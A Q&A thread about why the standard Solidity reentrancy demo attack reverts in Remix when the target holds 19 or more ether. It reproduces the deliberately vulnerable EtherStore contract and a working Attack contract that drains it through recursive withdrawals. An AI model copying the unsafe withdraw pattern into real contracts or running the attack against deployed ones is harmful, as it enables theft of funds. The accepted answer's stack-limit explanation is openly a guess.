# Can't reproduce reentrancy if the smart contract has >= 19 ether in remix

Tags: solidity, security

I'm trying to understand reentrancy in solidity. 
I took the example from [https://solidity-by-example.org/hacks/re-entrancy/.\](https://solidity-by-example.org/hacks/re-entrancy/.%5C)
You can also take the original one if you want, the result is the same.
The only difference is that now you can call deposit with any amount.
Here is the modified code for my purpose:

```
    // SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract EtherStore {
    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() public {
        uint bal = balances[msg.sender];
        require(bal > 0);

        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] = 0;
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

contract Attack {
    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    // Fallback is called when EtherStore sends Ether to this contract.
    fallback() external payable {
        if (address(etherStore).balance >= 1 ether) {
            etherStore.withdraw();
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        etherStore.deposit{value: msg.value}();
        etherStore.withdraw();
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}
```

I'm using remix for deploying the contract. 
Deposit 19 eth in EtherStore smart contract. So now it has 19 eth of balance.
Now launch attack with 1 eth in the value field of remix. The transacion reverts.
However, if you deposit <= 18 eth oin EtherStore and launch attack with 1 eth, now Attack has all the ether from EtherStore as expected.
Why doesn't it work with >= 19 ETH and 1 eth in attack?
The gas limit I'm using is the default.
The account has 100 ether, the environment is Shanghai but you can try other Remix VM, it doesn't matter, the result is the same.
I tried in truffle and it worked. I don't see the reason why it doesn't work in Remix.

Comment: How much gas are you using when you execute the attack? The attack is recursive so for every extra ether the gas will increase.

Comment: @Ismael The default in remix. 3000000.

Comment: better said: the default gas limit in remix 3.000.000

Comment: Does it work if you increase the gas limit?

Answer (score 0, accepted):

This may be a technical limitation in Remix. Your code is doing a recursion, where the EtherStore sends back 1 ether at a time until the balance is empty, so it does a number of loops equal to the amount of ether deposited. Due to some technical reason, maybe a stack overflow, with 18 loops it works but with the 19th loop it fails. Not a gas issue definitely.

I found this interesting so I built a test.
Deploy both contracts and call TestB.attack() passing the address of TestA and a numeric limit. Try different limits like 10, 20, 30, etc. Eventually it will fail, in my case at 26.

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract TestA {
    function callme(uint256 value, uint256 limit) public returns(uint256) {
        return TestB(msg.sender).callback(value, limit);
    }
}

contract TestB {
    function callback(uint256 value, uint256 limit) public returns(uint256) {
        if (value < limit) {
            return TestA(msg.sender).callme(value+1, limit);
        } else {
            return value;
        }
    }

    function attack(address testA, uint256 limit) public returns(uint256) {
        return TestA(testA).callme(0, limit);
    }
}
```

In Foundry it works perfectly with any limit. I don't think it can be fixed in Remix, there are just some things it doesn't get to.

Comment: I agree that it's not a gas issue. Gas limit in remix doesn't seem to work properly. It seems to ignore it. Editing gas limit and setting it to zero even let me to deploy the contract. Again, in truffle it works.